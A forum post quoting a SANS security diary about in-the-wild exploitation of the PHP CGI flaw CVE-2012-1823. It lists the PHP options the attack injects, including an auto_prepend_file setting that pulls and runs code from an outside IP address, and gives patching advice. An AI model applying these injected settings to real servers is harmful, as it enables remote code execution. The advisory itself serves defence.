News: Cexx forums, with volunteers dedicated to helping you remove malware and stay protected
 
Welcome, Guest. Please login or register.
Did you miss your activation email?

Login with username, password and session length
April 21, 2014, 04:23:58
Pages: [1]   Go Down
  Print  
Topic: PHP exploit in the wild CVE-2012-1823  (Read 913 times)
0 Members and 1 Guest are viewing this topic.
« on: May 28, 2012, 03:29:42 »
AplusWebMaster Offline
Global Moderator WWW

Karma: 501
Posts: 7977



FYI...

PHP exploit in the wild CVE-2012-1823 ...
- https://isc.sans.edu/diary.html?storyid=13312
Last Updated: 2012-05-28 03:48:35 UTC - "... an attempt to exploit the PHP vulnerability CVE-2012-1823* with the remote execution variant... each of the options invoked:
safe_mode=off: PHP disables the capacity of checking if the if the owner of the current script matches the owner of the file to be operated by a file funcionality. This directive has been deprecated on PHP 5.3.0 tree and removed on PHP 5.4.0 tree.
disable_functions=null: No function is disabled from the whole amount contained within PHP. This means that insecure functions are available like proc_open, exec, passthru, curl_exec, system, popen, curl_multi_exec and shell_exec. For more information on this functions, please check the PHP manual***.
allow_url_fopen=on: This directive allows PHP to open files located in http or ftp locations and operate them as a normal file descriptor.
allow_url_include=on:This directive allows to include additional PHP code located in a http or ftp URL into the PHP file before being processed and executed.
auto_prepend_file=http://81.17.24.82/info3.php: This directive includes the PHP code located in http://81.17.24.82/info3.php and execute it before the code inside index.php.
You can prevent this by using the latest stable PHP version located at the downloads page (1). If you are using windows... you can be affected by the CVE-2012-2376 (2). For more information regarding remediation on this vulnerability, please check my previous diary** ..."
* http://www.cvedetails.com/cve/CVE-2012-1823

>> http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-1823 - 7.5 (HIGH)
"... before 5.4.2..."

** http://isc.sans.edu/diary.html?storyid=13255

*** http://php.net/manual/en/index.php

1. http://www.php.net/downloads.php

2. http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2012-2376 - 10.0 (HIGH)
Last revised: 05/21/2012
Overview: Buffer overflow in the com_print_typeinfo function in PHP 5.4.3 and earlier on Windows allows remote attackers to execute arbitrary code via crafted arguments that trigger incorrect handling of COM object VARIANT types, as exploited in the wild in May 2012...

 Exclamation Exclamation
Logged

This machine has no brain.
....... Use your own.
Browser check for updates here.
.
 
Pages: [1]   Go Up
  Print  
 
Jump to:  

Powered by SMF 1.1.19 | SMF © 2013, Simple Machines Page created in 0.425 seconds with 19 queries.